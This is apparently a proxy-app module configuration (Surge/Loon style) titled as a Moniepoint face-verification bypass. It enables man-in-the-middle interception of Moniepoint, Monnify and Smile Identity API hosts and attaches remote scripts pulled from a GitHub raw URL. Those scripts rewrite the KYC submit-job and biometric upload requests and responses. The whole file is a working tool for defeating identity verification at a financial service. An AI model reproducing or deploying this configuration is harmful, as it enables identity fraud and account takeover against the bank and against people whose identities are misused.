#!name=Moniepoint 过人脸 V8
#!desc=访问 moniepoint.argun.cc 查看模块是否安装成功
#!category=Moniepoint

[MITM]
hostname = %APPEND% users.mab.console.teamapt.com, api.smileidentity.com, frontoffice.mp.monnify.com, moniepoint.argun.cc

[Script]

# web_req
webreq=type=http-request,pattern=^https:\/\/users\.mab\.console\.teamapt\.com\/api\/v1\/smile\/submit-job$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/refs/heads/main/Javascript/moniepoint_web_req.js, requires-body=1

# web_res
# web_res=type=http-response,pattern=^https:\/\/users\.mab\.console\.teamapt\.com\/api\/v1\/smile\/submit-job$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/refs/heads/main/Javascript/web_reference_res.js, requires-body=1

# web_reference
web_reference=type=http-response,pattern=^https:\/\/frontoffice\.mp\.monnify\.com\/api\/.*$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/refs/heads/main/Javascript/moniepoint_smile.js, requires-body=1

# reference
reference=type=http-response,pattern=^https:\/\/users\.mab\.console\.teamapt\.com\/api\/.*$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/refs/heads/main/Javascript/moniepoint_smile.js, requires-body=1, timeout=15

# hook
hook=type=http-response,pattern=^https:\/\/api\.smileidentity\.com\/v1\/upload$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/refs/heads/main/Javascript/hook.js, requires-body=1

# 查看模块是否安装成功
check_status=type=http-response,pattern=^https:\/\/moniepoint\.argun\.cc\/$, script-path=https://raw.githubusercontent.com/iamhysterng/moniepoint/refs/heads/main/Javascript/moniepoint_check_status.js, requires-body=1
